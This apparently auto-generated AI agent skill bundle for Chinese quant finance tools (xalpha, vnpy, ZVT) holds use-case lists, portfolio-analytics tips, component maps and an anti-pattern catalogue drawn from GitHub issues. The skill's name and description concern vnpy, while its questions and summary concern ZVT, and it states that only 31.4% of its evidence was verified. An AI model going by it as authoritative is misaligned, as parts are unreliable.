Total: **16**

## `KUC-101`
**Source**: `doc/samples/ACshare.ipynb`

Determine whether A-share or C-share fund classes are more cost-effective based on expected holding period, accounting for different fee structures including sales service fees.

## `KUC-102`
**Source**: `doc/samples/ETFanalysis.ipynb`

Analyze the historical investment performance of E's (且慢 platform) index investment portfolio, including monthly investment frequency, annualized returns, and benchmark comparison.

## `KUC-103`
**Source**: `doc/samples/cbond.ipynb`

Calculate intrinsic value, option value, and total value of convertible bonds using option pricing models, comparing xalpha estimates against third-party (富投) valuations.

## `KUC-104`
**Source**: `doc/samples/changyingcorr.ipynb`

Analyze correlation between different investment varieties in the '长赢指数投资' strategy and compare growth potential of narrow-based industry indices.

## `KUC-105`
**Source**: `doc/samples/enhancefund.ipynb`

Evaluate whether enhanced index funds (增强型基金) actually generate alpha over their benchmarks, measuring excess returns and information ratios.

## `KUC-106`
**Source**: `doc/samples/evaluate.ipynb`

Compare normalized net value trends and correlation coefficients across multiple major indices (SSE 50, CSI 300, CSI 500, ChiNext) to understand their relationships.

## `KUC-107`
**Source**: `doc/samples/gridbacktest.ipynb`

Backtest grid trading strategy parameters (price levels, buy/sell amounts, price ratios) on sector ETFs to find optimal grid configurations.

## `KUC-108`
**Source**: `doc/samples/info.ipynb`

Retrieve fund and index information including price history, dividends, and calculate key metrics like alpha, beta, volatility, Sharpe ratio, and information ratio.

## `KUC-109`
**Source**: `doc/samples/mul.ipynb`

Manage and evaluate investment portfolios containing multiple funds, including position analysis, trade volume visualization, and comprehensive performance metrics.

## `KUC-110`
**Source**: `doc/samples/netvalueestimation.ipynb`

Estimate oil fund net values by calculating weighted positions based on quarterly holdings disclosures and tracking tracking error from benchmark indices.

## `KUC-111`
**Source**: `doc/samples/newparadigm.ipynb`

Fetch real-time and historical data for various asset classes including currencies, commodities, US stocks, A-shares, Hong Kong stocks, and funds using multiple data sources.

## `KUC-112`
**Source**: `doc/samples/oilfund.ipynb`

Compare performance and correlation of multiple oil funds (华宝油气, 广发石油, 华安石油, 南方原油, etc.) to identify best performers and understand oil sector fund dynamics.

## `KUC-113`
**Source**: `doc/samples/policy.ipynb`

Implement various investment policies including buy-and-hold, scheduled dollar-cost averaging, and tuned scheduled investment that adjusts amounts based on market conditions.

## `KUC-114`
**Source**: `doc/samples/schedulestudy.ipynb`

Study the effectiveness of scheduled investment (dollar-cost averaging) strategies on different indices including CSI 500, CSI 500 Low Volatility, and ChiNext during bull markets.

## `KUC-115`
**Source**: `doc/samples/trade.ipynb`

Analyze personal investment performance by reading trade records from CSV files, calculating XIRR returns, visualizing portfolio value changes and trade costs.

## `KUC-116`
**Source**: `doc/samples/virtualtrade.ipynb`

Simulate virtual investment portfolios with multiple funds, analyzing returns, position allocation, category distribution, and underlying stock holdings for institutional tracking.

FILE:references/WISDOM.md
# Cross-Project Wisdom

Total: **10**

## `CW-PORTFOLIO-ANALYTICS-001` — Defensive zero-division guards with explicit handling
**From**: finance-bp-066--wealthbot, finance-bp-082--stock-screener, finance-bp-093--PyPortfolioOpt · **Applicable to**: portfolio-analytics

Always guard division operations with explicit zero-value checks before executing. In price ratio calculations, filter out securities where old_price is zero before calling getPricesDiff. In composite score calculations, guard against total_weight of zero and return 0.0 for empty input lists. This prevents NaN/infinity propagation that corrupts downstream calculations and crashes pipelines.

## `CW-PORTFOLIO-ANALYTICS-002` — Covariance matrix positive-semidefiniteness verification
**From**: finance-bp-093--PyPortfolioOpt, finance-bp-117--Riskfolio-Lib · **Applicable to**: portfolio-analytics

Always verify covariance matrix is positive-semidefinite before passing to CVXPY optimization. Apply eigenvalue clipping if violated, as non-PSD matrices cause Cholesky decomposition failures. Both PyPortfolioOpt and Riskfolio-Lib enforce this constraint to prevent optimizer from finding mathematically invalid solutions or crashing entirely.

## `CW-PORTFOLIO-ANALYTICS-003` — Geometric compounding for cumulative returns
**From**: finance-bp-068--xalpha, finance-bp-106--pyfolio-reloaded, finance-bp-107--empyrical-reloaded · **Applicable to**: portfolio-analytics

Compute cumulative returns using geometric compounding via cumprod(1 + returns), never arithmetic cumulation via cumsum. Arithmetic cumulative sum overstates gains and understates losses, causing cumulative returns to diverge significantly from actual portfolio performance over volatile periods. This principle applies to total return index construction and any cumulative performance calculation.

## `CW-PORTFOLIO-ANALYTICS-004` — Temporal shift enforcement to prevent look-ahead bias
**From**: finance-bp-108--finmarketpy, finance-bp-106--pyfolio-reloaded · **Applicable to**: portfolio-analytics

Enforce proper temporal shifting in signal generation and position calculations. Use shift(-1) for exit signals to prevent look-ahead bias, and shift(1) when estimating intraday positions from EOD data. Forward-fill carry data and backward-fill only old data gaps, never forward-fill spot prices. Violations cause live trading returns to diverge from backtested results.

## `CW-PORTFOLIO-ANALYTICS-005` — DCP-compliant convex optimization construction
**From**: finance-bp-093--PyPortfolioOpt, finance-bp-117--Riskfolio-Lib · **Applicable to**: portfolio-analytics

Use only DCP-compliant convex objectives and constraints in CVXPY. Provide constraints as callable functions accepting weight variables, use valid bounds formats matching n_assets length, and verify target parameters (volatility, return) are within feasible ranges. Non-convex or infeasible problems fail with DCPError or OptimizationError, preventing optimization entirely.

## `CW-PORTFOLIO-ANALYTICS-006` — Correct Sharpe ratio formula with risk-free rate subtraction
**From**: finance-bp-107--empyrical-reloaded, finance-bp-118--FinanceToolkit · **Applicable to**: portfolio-analytics

Calculate Sharpe ratio using (mean returns - risk_free) / std(returns) * sqrt(annualization) with sample standard deviation (ddof=1). Subtract risk-free rate from asset returns before dividing by volatility. Incorrect Sharpe ratio calculation produces misleading risk-adjusted return estimates, causing poor investment decisions based on faulty performance attribution.

## `CW-PORTFOLIO-ANALYTICS-007` — Immutable FIFO position tracking with chronological ordering
**From**: finance-bp-068--xalpha, finance-bp-066--wealthbot · **Applicable to**: portfolio-analytics

Maintain FIFO position tracking with strictly increasing date order for position entries. Use copy() function to create independent copies before mutating remtable to avoid side effects. Enforce chronological ordering in sell operations to ensure correct cost basis and holding period calculation, particularly important for funds with tiered fees by holding period.

## `CW-PORTFOLIO-ANALYTICS-008` — Validation at system boundaries with descriptive errors
**From**: finance-bp-082--stock-screener, finance-bp-093--PyPortfolioOpt, finance-bp-117--Riskfolio-Lib · **Applicable to**: portfolio-analytics

Enforce validation at system boundaries with descriptive error messages. Validate expected returns matches covariance matrix dimensions, score values are within [0, 100], confidence values within [0, 1], and required DataFrame columns are present. Invalid inputs should raise ValueError with descriptive messages listing valid options to prevent silent failures or corrupted calculations.

## `CW-PORTFOLIO-ANALYTICS-009` — Decimal rounding for monetary calculations
**From**: finance-bp-068--xalpha, finance-bp-107--empyrical-reloaded · **Applicable to**: portfolio-analytics

Use Decimal with explicit rounding (myround) for each monetary calculation to avoid floating-point errors that cause share miscalculation and incorrect cost basis. This prevents rounding errors from propagating to XIRR and portfolio valuation calculations. Direct floating-point operations in financial calculations accumulate errors that become material over many transactions.

## `CW-PORTFOLIO-ANALYTICS-010` — Cash flow sign convention enforcement
**From**: finance-bp-106--pyfolio-reloaded, finance-bp-068--xalpha · **Applicable to**: portfolio-analytics

Mark cash outflows as negative and cash inflows as positive in cftable. Incorrect cash flow signs cause NPV calculation to invert, producing negative returns for profitable trades and vice versa. Verify sum of round trip PnLs equals total realized transaction dollars to catch sign convention errors before they corrupt performance attribution.

FILE:references/components/backtesting_engine.md
# backtesting_engine (8 classes)

## `BTE.backtest`
`backtesting_engine/bte-backtest.py:0`

## `Scheduled.run`
`backtesting_engine/scheduled-run.py:0`

## `AverageScheduled.run`
`backtesting_engine/averagescheduled-run.py:0`

## `ScheduledSellonXIRR.run`
`backtesting_engine/scheduledsellonxirr-run.py:0`

## `Tendency28.run`
`backtesting_engine/tendency28-run.py:0`

## `Balance.run`
`backtesting_engine/balance-run.py:0`

## `Grid.run`
`backtesting_engine/grid-run.py:0`

## `backtest_strategy`
`backtesting_engine/backtest-strategy.py:0`

FILE:references/components/data_acquisition_-_caching.md
# data_acquisition_&_caching (5 classes)

## `vinfo.vinfo`
`data_acquisition_&_caching/vinfo-vinfo.py:0`

## `get_daily`
`data_acquisition_&_caching/get-daily.py:0`

## `get_rt`
`data_acquisition_&_caching/get-rt.py:0`

## `cachedio`
`data_acquisition_&_caching/cachedio.py:0`

## `data_source_handler`
`data_acquisition_&_caching/data-source-handler.py:0`

FILE:references/components/fund-index_information_-_pricing.md
# fund/index_information_&_pricing (7 classes)

## `basicinfo.__init__`
`fund/index_information_&_pricing/basicinfo-init.py:0`

## `fundinfo`
`fund/index_information_&_pricing/fundinfo.py:0`

## `mfundinfo`
`fund/index_information_&_pricing/mfundinfo.py:0`

## `indexinfo`
`fund/index_information_&_pricing/indexinfo.py:0`

## `cashinfo`
`fund/index_information_&_pricing/cashinfo.py:0`

## `fee_parser`
`fund/index_information_&_pricing/fee-parser.py:0`

## `info_source`
`fund/index_information_&_pricing/info-source.py:0`

FILE:references/components/portfolio_aggregation_-_analysis.md
# portfolio_aggregation_&_analysis (4 classes)

## `mul.__init__`
`portfolio_aggregation_&_analysis/mul-init.py:0`

## `mulfix.__init__`
`portfolio_aggregation_&_analysis/mulfix-init.py:0`

## `imul.__init__`
`portfolio_aggregation_&_analysis/imul-init.py:0`

## `portfolio_type`
`portfolio_aggregation_&_analysis/portfolio-type.py:0`

FILE:references/components/position_tracking_-_fifo.md
# position_tracking_&_fifo (4 classes)

## `remain.buy`
`position_tracking_&_fifo/remain-buy.py:0`

## `remain.sell`
`position_tracking_&_fifo/remain-sell.py:0`

## `remain.trans`
`position_tracking_&_fifo/remain-trans.py:0`

## `position_accounting`
`position_tracking_&_fifo/position-accounting.py:0`

FILE:references/components/technical_indicators_-_evaluation.md
# technical_indicators_&_evaluation (5 classes)

## `indicator.bcmkset`
`technical_indicators_&_evaluation/indicator-bcmkset.py:0`

## `evaluate.__init__`
`technical_indicators_&_evaluation/evaluate-init.py:0`

## `IndexPEBHistory.__init__`
`technical_indicators_&_evaluation/indexpebhistory-init.py:0`

## `QDIIPredict.get_t0_rate`
`technical_indicators_&_evaluation/qdiipredict-get-t0-rate.py:0`

## `indicator_set`
`technical_indicators_&_evaluation/indicator-set.py:0`

FILE:references/components/trade_accounting_-_cash_flow.md
# trade_accounting_&_cash_flow (4 classes)

## `trade.__init__`
`trade_accounting_&_cash_flow/trade-init.py:0`

## `itrade.__init__`
`trade_accounting_&_cash_flow/itrade-init.py:0`

## `xirrcal.xirrcal`
`trade_accounting_&_cash_flow/xirrcal-xirrcal.py:0`

## `xirr_algorithm`
`trade_accounting_&_cash_flow/xirr-algorithm.py:0`

FILE:references/components/trading_policy_generation.md
# trading_policy_generation (8 classes)

## `policy.status_gen`
`trading_policy_generation/policy-status-gen.py:0`

## `buyandhold.run`
`trading_policy_generation/buyandhold-run.py:0`

## `scheduled.run`
`trading_policy_generation/scheduled-run.py:0`

## `scheduled_window.run`
`trading_policy_generation/scheduled-window-run.py:0`

## `grid.run`
`trading_policy_generation/grid-run.py:0`

## `indicator_cross.run`
`trading_policy_generation/indicator-cross-run.py:0`

## `indicator_points.run`
`trading_policy_generation/indicator-points-run.py:0`

## `policy_type`
`trading_policy_generation/policy-type.py:0`

ClawHub Coding Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Vnpy Futures Trading

Skill

VeighNa（原vnpy）支持中国期货自动交易执行，集成日盘/夜盘交易时段管理，并提供CSI300成分股数据下载及Alpha101/LightGBM等因子研究工作流。。

---
name: vnpy-futures-trading
description: |-
  VeighNa（原vnpy）支持中国期货自动交易执行，集成日盘/夜盘交易时段管理，并提供CSI300成分股数据下载及Alpha101/LightGBM等因子研究工作流。。
license: Proprietary. See LICENSE.txt in project root.
compatibility: Designed for Doramagic-host ecosystem (Claude Code / openclaw / Cursor). Requires Python 3.12+ with uv package manager.
metadata:
  version: "v6.1"
  blueprint_id: "finance-bp-081"
  compiled_at: "2026-04-22T13:00:31.772009+00:00"
  capability_markets: "cn-astock"
  capability_activities: "backtesting, factor-research"
  sop_version: "crystal-compilation-v6.1"
---
# VnPy 期货交易 (vnpy-futures-trading)

> VeighNa（原vnpy）支持中国期货自动交易执行，集成日盘/夜盘交易时段管理，并提供CSI300成分股数据下载及Alpha101/LightGBM等因子研究工作流。

## Pipeline

`data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization`

## Top Use Cases (21 total)

### CSI300 Index Data Download via RQData (`UC-101`)
Download historical CSI300 index constituent stock data from RQData data service for use in alpha factor research and backtesting
**Triggers**: download index constituents, RQData, CSI300 data

### CSI300 Index Data Download via XTQuant (`UC-102`)
Download historical CSI300 index constituent stock data from XTQuant data service for use in alpha factor research
**Triggers**: download index constituents, XTQuant, CSI300 data

### CTA Strategy Backtesting Demo (`UC-110`)
Backtest ATR RSI trading strategy on futures contracts to evaluate performance metrics and optimize parameters
**Triggers**: backtesting, ATR RSI strategy, futures trading

For all **21** use cases, see [references/USE_CASES.md](references/USE_CASES.md).

**Execute trigger**: `When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)`

## What I'll Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Semantic Locks (Fatal)

| ID | Rule | On Violation |
|---|---|---|
| `SL-01` | Execute sell orders before buy orders in every trading cycle | halt |
| `SL-02` | Trading signals MUST use next-bar execution (no look-ahead) | halt |
| `SL-03` | Entity IDs MUST follow format entity_type_exchange_code | halt |
| `SL-04` | DataFrame index MUST be MultiIndex (entity_id, timestamp) | halt |
| `SL-05` | TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount | halt |
| `SL-06` | filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION | halt |
| `SL-07` | Transformer MUST run BEFORE Accumulator in factor pipeline | halt |
| `SL-08` | MACD parameters locked: fast=12, slow=26, signal=9 | halt |

Full lock definitions: [references/LOCKS.md](references/LOCKS.md)

## Top Anti-Patterns (25 total)

- **`AP-ZVT-183`**: 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败
- **`AP-ZVT-179`**: 第三方数据接口超限后异常被吞噬，数据静默缺失
- **`AP-ZVT-183B`**: HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移

All 25 anti-patterns: [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md)

## Evidence Quality Notice

> [QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-081. Evidence verify ratio = 31.4% and audit fail total = 23. Generated results may have uncaptured requirement gaps. Verify critical decisions against source files (LATEST.yaml / LATEST.jsonl).

## Reference Files

| File | Contents | When to Load |
|---|---|---|
| [references/seed.yaml](references/seed.yaml) | V6+ 全量权威 (source-of-truth) | 有行为/决策争议时必读 |
| [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md) | 25 条跨项目反模式 | 开始实现前 |
| [references/WISDOM.md](references/WISDOM.md) | 跨项目精华借鉴 | 架构决策时 |
| [references/CONSTRAINTS.md](references/CONSTRAINTS.md) | domain + fatal 约束 | 规则冲突时 |
| [references/USE_CASES.md](references/USE_CASES.md) | 全量 KUC-* 业务场景 | 需要完整示例时 |
| [references/LOCKS.md](references/LOCKS.md) | SL-* + preconditions + hints | 生成回测/交易代码前 |
| [references/COMPONENTS.md](references/COMPONENTS.md) | AST 组件地图（按 module 拆分）| 查 API 时 |

---

*Compiled by Doramagic crystal-compilation-v6.1 from `finance-bp-081` blueprint at 2026-04-22T13:00:31.772009+00:00.*
*See [human_summary.md](human_summary.md) for non-technical overview.*

FILE:human_summary.md
# Human Summary

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- **tagline**: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)
- **use_cases**: ['Alpha101 Factor Research Workflow', 'CSI300 Index Data Download via XTQuant', 'CSI300 Index Data Download via RQData', 'A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney', 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader', 'Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout', 'Index composition data collection (SZ1000, SZ2000) with EM recorder']

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

FILE:references/ANTI_PATTERNS.md
# Anti-Patterns (Cross-Project)

Total: **25**

## qlib (9)

### `AP-QLIB-1930` — 回测结果与模型无关——共享 dataset 对象导致预测值被首次模型覆盖 <sub>(high)</sub>

Qlib 中多个模型复用同一个已 fit 的 DatasetH 实例时，dataset 内部的标准化 参数（fit_start_time/fit_end_time 决定的归一化统计量）在第一次 fit 后固化。 切换模型但不重新初始化 dataset，导致所有模型实际使用同一套预测信号。表现为 无论换 LightGBM/XGBoost/DNN，回测净值曲线完全一致。这是最危险的"实验看起来 在跑，但结论全部无效"反模式。

Source: https://github.com/microsoft/qlib/issues/1930

### `AP-QLIB-2090` — fit_start_time 与 train segment 双重配置引发隐式数据泄露 <sub>(high)</sub>

Qlib DatasetH 有两个"训练数据范围"：handler 的 fit_start_time/fit_end_time （决定归一化器拟合范围）和 segments.train（决定模型训练范围）。常见错误是 让 fit_end_time 覆盖 valid/test 段，使归一化统计量（均值、标准差）包含了 未来数据，造成前向偏差（look-ahead bias）。两者独立配置但语义耦合，文档 未明确说明 fit_end_time 必须 <= train_end。

Source: https://github.com/microsoft/qlib/issues/2090

### `AP-QLIB-2036` — MACD 因子公式文档错误——DEA 被多除一次 CLOSE 导致量纲不一致 <sub>(high)</sub>

Qlib 官方文档中的 Alpha 公式示例将 MACD 的 DEA 定义为 EMA(DIF, 9) / CLOSE， 但 DIF 已经是无量纲（除过 CLOSE 的），再次除以 CLOSE 导致 DEA 量纲为 1/price。 基于此文档公式构建的 MACD 因子在截面标准化后与正确公式差异显著，IC 下降。 此类文档层面的公式错误会被大量用户直接照搬入生产因子库。

Source: https://github.com/microsoft/qlib/issues/2036

### `AP-QLIB-2184` — 自定义 A 股数据导入前未按约定填充停牌日 NaN，引发下游因子噪声 <sub>(high)</sub>

Qlib 约定停牌日 open/close/high/low/volume/factor 字段均应填 NaN，以便框架 在因子计算时识别并跳过。用户自建 A 股数据集时若将停牌日保留为上一日价格 （常见于从东财/Wind 直接导出的数据），会导致停牌期间的价格动量因子出现 "假信号"（价格不变但因子非零）。Qlib 不校验此约定，错误静默流入训练数据。

Source: https://github.com/microsoft/qlib/issues/2184

### `AP-QLIB-1892` — PIT（Point-In-Time）财务数据收集器依赖外部股票列表接口，全量 A 股获取不完整 <sub>(high)</sub>

Qlib 的 PIT 数据收集器（财务数据时间点快照）在初始化时调用 get_hs_stock_symbols() 获取沪深股票列表。该函数依赖东财 API，经常仅返回 部分列表而非全量 5000+ 股票，且函数在获取不完整时直接 raise ValueError。 用户若按文档步骤操作，财务数据集将只覆盖部分股票，基于 PIT 财务因子的回测 存在严重生存者偏差（未被采集的股票被隐式排除）。

Source: https://github.com/microsoft/qlib/issues/1892

### `AP-QLIB-2097` — 全市场 instrument="all" 在 32GB 内存机器上 OOM，但 CSI300 正常 <sub>(medium)</sub>

Qlib 在加载 Alpha158 特征时会将指定 universe 的全部特征矩阵一次性载入内存。 使用 instrument="csi300"（300 股）与 instrument="all"（5000+ 股）的内存占用 差约 16 倍。32GB 机器跑全市场时在 init_instance_by_config 阶段直接 OOM， 错误信息不提示内存问题。用户容易误以为是配置错误，实际上需要分批加载或 使用流式特征计算。

Source: https://github.com/microsoft/qlib/issues/2097

### `AP-QLIB-1984` — LightGBM 模型标签维度校验逻辑永远不触发导致多标签训练静默失败 <sub>(medium)</sub>

Qlib gbdt.py 中用 y.values.ndim == 2 判断是否为多标签，但从 DataFrame 取出的 Series 的 ndim 永远为 1，条件永远为 False，因此多标签训练不会走 squeeze 分支，而是直接进入 LightGBM 训练并在更深处抛出语义不明的错误。 用户尝试自定义多标签任务时无法从错误信息定位到此根因。

Source: https://github.com/microsoft/qlib/issues/1984

### `AP-QLIB-1915` — 自定义 CSV 数据 dump_bin 后 DataHandler 报 Length mismatch，D.features 却正常 <sub>(high)</sub>

Qlib 存在两套数据访问路径：D.features（直接读 binary）和 DataHandler/DataHandlerLP （带 processor pipeline）。自定义 A 股 CSV 数据在 dump_bin 时若字段顺序 或 symbol 格式（如 600000.SH vs SH600000）与 Qlib 约定不符，DataHandler 的 processor 在 align/reindex 时触发 Length mismatch，而 D.features 因不 经过 processor 而成功。这一"两套路径行为不一致"让用户误以为数据已正确导入。

Source: https://github.com/microsoft/qlib/issues/1915

### `AP-QLIB-1949` — Colab/Linux 多进程后端与 Qlib ParallelExt 冲突导致 DataHandler 完全不可用 <sub>(medium)</sub>

Qlib 在非 fork 环境（Windows 或 Google Colab）中，DataHandler 使用 joblib 并行加载特征时，ParallelExt 初始化时访问 _backend_args 属性失败（AttributeError）。 根因是 joblib 1.5+ 移除了该内部属性，Qlib 的兼容层未更新。表现为 D.features 调用抛出多层嵌套异常，用户无法从错误栈判断是并行后端问题还是数据问题。

Source: https://github.com/microsoft/qlib/issues/1949

## vnpy (4)

### `AP-VNPY-3691` — K 线生成器首根 K 线时间戳不对齐，导致第一个周期信号错误 <sub>(high)</sub>

vnpy BarGenerator 在合成 N 分钟 K 线时，第一根推送的 K 线时间戳为"当前 tick 所在分钟"而非"完整 N 分钟周期结束时间"。具体表现：09:59 的 tick 会 触发一根不完整的 5 分钟 K 线推送（本应等到 10:04 才推送）。策略若在 on_bar 中直接用 datetime.minute % 5 过滤，第一根 K 线恰好通过，但包含的 数据不足一个完整周期，用于信号计算会产生错误的开仓信号。

Source: https://github.com/vnpy/vnpy/issues/3691

### `AP-VNPY-3669` — Alpha 模块历史数据增量保存时新旧 DataFrame schema 不兼容导致 SchemaError <sub>(medium)</sub>

vnpy Alpha 模块在保存 K 线数据到 Parquet 文件时，将新下载数据（可能含 Float64 列）与已存文件（历史 Int64 列）直接 polars.concat。polars 强类型 不允许隐式类型提升，抛出 SchemaError。根因是不同数据源/版本返回的字段类型 不一致（如 volume 在部分行情源为整数，在另一些为浮点），且 concat 前无 schema 对齐步骤。影响所有使用 vnpy alpha 进行回测的历史数据构建流程。

Source: https://github.com/vnpy/vnpy/issues/3669

### `AP-VNPY-3685` — 价差交易模块 run_backtesting() 在 Jupyter 环境下静默报错，结果不可信 <sub>(high)</sub>

vnpy 4.10 价差交易（SpreadTrading）模块的 run_backtesting() 在 Jupyter 环境下存在事件循环冲突（asyncio already running），导致回测引擎部分逻辑 不执行但不抛异常，返回看似正常的回测统计数据。同样代码在命令行 Python 中无此问题。vnpy 4.x 将部分 IO 改为 async 但 Jupyter 的事件循环与之不兼容， 是"回测结果看起来正确但实际不完整"的隐蔽陷阱。

Source: https://github.com/vnpy/vnpy/issues/3685

### `AP-VNPY-3700` — 安装脚本不使用 venv 导致全局 numpy 版本被降级破坏其他依赖 <sub>(medium)</sub>

vnpy install.bat 直接在系统/conda base 环境安装，会强制降级 numpy 到 <2.0 以满足 vnpy 依赖，破坏依赖 numpy 2.x 的其他量化工具（如 scipy、pytorch 新版）。 没有 requirements.txt，依赖边界不透明。在多工具共存的量化研究环境中， vnpy 的安装脚本是"全局环境污染"的常见根源。

Source: https://github.com/vnpy/vnpy/issues/3700

## zipline (6)

### `AP-ZIPLINE-138` — 回测价格为未复权价，教程图表误导用户误判策略收益 <sub>(high)</sub>

Zipline 教程使用 AAPL 股价图做演示，但 bundle 中存储的是未复权价格（raw price）， 而非经过拆股/分红调整的复权价。图表显示的历史价格与市场实际价约差 4 倍（Apple 历次拆股累计因子），用户误将"价格翻 4 倍"当作策略收益。A 股场景更严重： 除权前后价格跳变会在未复权数据中形成巨大"信号"，吸引技术指标在除权日产生 虚假突破信号。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/138

### `AP-ZIPLINE-235` — 默认以当根 K 线收盘价成交，低估实盘滑点，策略回测收益虚高 <sub>(high)</sub>

Zipline 默认滑点模型在当根 K 线触发信号后，以同根 K 线收盘价成交（current bar close fill）。实盘中信号只能在下一根 K 线的开盘价附近成交（T+1 order execution）。以 A 股日线为例，用收盘价回测比用次日开盘价成交平均高估日收益 约 0.1-0.3%，年化差距可超 30%。需显式配置 slippage model 为 VolumeShareSlippage 或 FixedSlippage 并设合理 volume_limit。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/235

### `AP-ZIPLINE-190` — 日历 start_session 设为非交易日触发 DateOutOfBounds，无提示如何修正 <sub>(medium)</sub>

Zipline 在注册 bundle 或运行算法时，若 start_session 参数恰好是非交易日 （如 1998-01-01 元旦），Calendar 校验抛出 DateOutOfBounds（"cannot be earlier than the first session"）。错误信息仅显示交易日历起始日，不提示"请改为第一个 交易日"。A 股场景：使用 SSE/SZSE 日历时，若 start_date 恰好是春节前最后 一天次日（节假日），会触发同类错误，调试成本极高。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/190

### `AP-ZIPLINE-181` — asset db 过期后 Pipeline 报"no assets traded"，误导用户排查数据范围 <sub>(high)</sub>

Zipline 的 asset database（SQLite）记录每只股票的 start/end 交易日期。若 使用了旧版 Quandl/自建 bundle 且未重新 ingest，在回测新日期范围时 Pipeline 抛出 "Failed to find any assets with country_code 'US' that traded between [dates]"。A 股场景：重新下载行情后若只更新价格数据而未重建 asset db，退市/ 新上市股票的日期范围不更新，Pipeline 过滤会悄悄排除这些股票，产生生存者偏差。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/181

### `AP-ZIPLINE-285` — week_start()/week_end() 在自定义日历（非美股）下静默失效 <sub>(medium)</sub>

Zipline schedule_function 的 date_rules.week_start() 和 date_rules.week_end() 依赖交易日历的周首/周末判断逻辑，但在非美股日历（如 ASX、SSE）中，该逻辑 与 NYSE 日历的偏移计算不兼容，导致 schedule 永远不触发或在错误的日期触发。 A 股场景：使用 SSE 日历时，含春节等连续长假的周，week_start 可能跳过整个 假期周而不调仓，但用户无法从日志发现未触发的调度。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/285

### `AP-ZIPLINE-240` — 回测日期时区必须为 UTC，传入 naive datetime 引发深层 AssertionError <sub>(medium)</sub>

Zipline 内部强制要求所有时间戳为 UTC aware datetime。当用户传入 naive datetime （无时区信息，如 pd.Timestamp('2020-01-01')）时，不在入口处报错，而是在 算法执行深处触发 AssertionError: Algorithm should have a utc datetime，栈深 难以定位。A 股开发者从本地 CST 时间导入数据时极易触发此陷阱，需在 bundle 注册时显式 tz_localize('UTC')。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/240

## zvt (6)

### `AP-ZVT-183` — 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败 <sub>(high)</sub>

ZVT 在计算前复权因子时以 new/old 价格比计算 qfq_factor。当 old==0（新股首日 或数据缺失）时因子为 inf；当 kdata.open 本身为 None（停牌日未填充）时乘法 抛出 TypeError。结果：整个 entity 的复权计算中断，后续 K 线全部丢失，但主 流程只 log ERROR 不中断，用户往往不知道已有大量股票数据损坏。

Source: https://github.com/zvtvz/zvt/issues/183

### `AP-ZVT-179` — 第三方数据接口超限后异常被吞噬，数据静默缺失 <sub>(high)</sub>

ZVT 使用聚宽 jqdatasdk 批量拉取全市场 K 线时（4000+ 股票），触发聚宽每日 最大查询条数限制（错误：已超过每日最大查询数量）。ZVT 捕获异常后继续执行下一 entity，导致超限后所有股票的当日数据均静默缺失。回测若使用该残缺数据库，因 子计算结果将产生系统性偏差，且无告警。

Source: https://github.com/zvtvz/zvt/issues/179

### `AP-ZVT-161` — 全市场 SQLite 批量因子计算触发 too many SQL variables 错误 <sub>(medium)</sub>

ZVT 在计算 VolumeUpMaFactor 等多股因子时，将所有 entity_id 拼入单条 SQL 的 IN 子句。当 A 股全市场（5000+ 股）一次性查询时，触发 SQLite 默认限制 SQLITE_MAX_VARIABLE_NUMBER=999。调大 max_allowed_packet（MySQL 参数）无效， 根因是 SQLite 变量数上限。正确解法是分批查询，但 ZVT 早期版本未处理此边界。

Source: https://github.com/zvtvz/zvt/issues/161

### `AP-ZVT-129` — 使用通配符导入隐藏 API 版本变更，AdjustType 等枚举莫名消失 <sub>(medium)</sub>

ZVT 文档示例使用 `from zvt import *` 导入所有符号。当 ZVT 版本升级重构 枚举（如将 AdjustType 移入子模块）后，通配符导入不再包含该符号，触发 AttributeError。使用者误以为是安装问题，实际是版本间 API breaking change 未在 CHANGELOG 中标注，且通配符导入掩盖了具体来源。应显式 import 枚举类。

Source: https://github.com/zvtvz/zvt/issues/129

### `AP-ZVT-187` — 回测引擎未在数据层空结果时提前终止，导致空指针级联崩溃 <sub>(medium)</sub>

